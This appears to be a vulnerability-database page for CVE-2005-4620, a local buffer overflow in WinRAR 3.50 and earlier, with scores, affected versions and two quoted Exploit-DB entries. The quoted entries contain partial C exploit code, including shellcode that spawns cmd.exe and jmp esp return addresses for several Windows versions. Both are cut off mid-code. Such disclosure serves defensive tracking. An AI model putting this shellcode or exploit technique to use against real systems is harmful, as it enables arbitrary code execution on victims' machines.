CVE-2005-4620
published 2005-12-31CVE-2005-4620: Buffer overflow in WinRAR 3.50 and earlier allows local users to execute arbitrary code via a long command-line argument. NOTE: because this program executes…
PriorityP422medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
1.48%
70.8th percentile
Buffer overflow in WinRAR 3.50 and earlier allows local users to execute arbitrary code via a long command-line argument. NOTE: because this program executes with the privileges of the invoking user, and because remote programs do not normally have the ability to specify a command-line argument for this program, there may not be a typical attack vector for the issue that crosses privilege boundaries. Therefore this may not be a vulnerability.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)
exploitdb·2006-01-04
CVE-2005-4620 WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)
WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)
---
/* WinRAR Buffer Overflow 3.30 Exploit
*
* Bug founded by: Vredited By Alpha Programmer & Trap-Set U.H Team
* Exploit made by: K4P0
* Contact: [email protected]
*/
#include
#include
int main(void)
{
char EvilBuff[1024];
// Normal cmd.exe shellcode.
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6"
"\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
"\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";
char jmpesp_offset[] = "\x0F\x98\xF8\x77";
char Prog[1024] = "WinRAR ";
printf("WinRAR Buffer Overflow 3.30 Exploit\n\n");
printf("Bug discovered by: Vredited By Alpha Programmer & Trap-Set U.H Team\n");
printf("Exploit made by: K4P0\n");
memset(EvilBuff, 0x00,
Exploit-DB
WinRAR 3.30 - 'Filename' Local Buffer Overflow (2)
exploitdb·2006-01-04
CVE-2005-4620 WinRAR 3.30 - 'Filename' Local Buffer Overflow (2)
WinRAR 3.30 - 'Filename' Local Buffer Overflow (2)
---
/*
IHS public source code
WinRAR 3.3.0 and below local BOF exploit
author : c0d3r , kaveh razavi
advisory : http://www.securityfocus.com/archive/1/420679
tnx to alpha who reported the vulnerability
workaround: use the lastest version
special tnx to LorD and NT of IHS (my workmates and best friends)
www.ihsteam.com
www.ihsteam.net
www.c0d3r.org
showing some of iranian kids what real hacking is .
specially those who think changing a name server is hacking =)
*/
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 930
char exploit[size];
char winxpsp1[] = "\xCC\x59\xFB\x77"; // jmp esp in ntdll
char winxpsp2[] = "\xED\x1E\x94\x7C"; // jmp esp (not tested)
char win2ksp4[] = "\xBB\xED\x4F\x7C"; //
No writeups or analysis indexed.
http://www.rarlab.com/rarnew.htmhttp://www.securityfocus.com/archive/1/420679/100/0/threadedhttp://www.securityfocus.com/bid/15123http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.chttp://www.rarlab.com/rarnew.htmhttp://www.securityfocus.com/archive/1/420679/100/0/threadedhttp://www.securityfocus.com/bid/15123http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c
2005-12-31
Published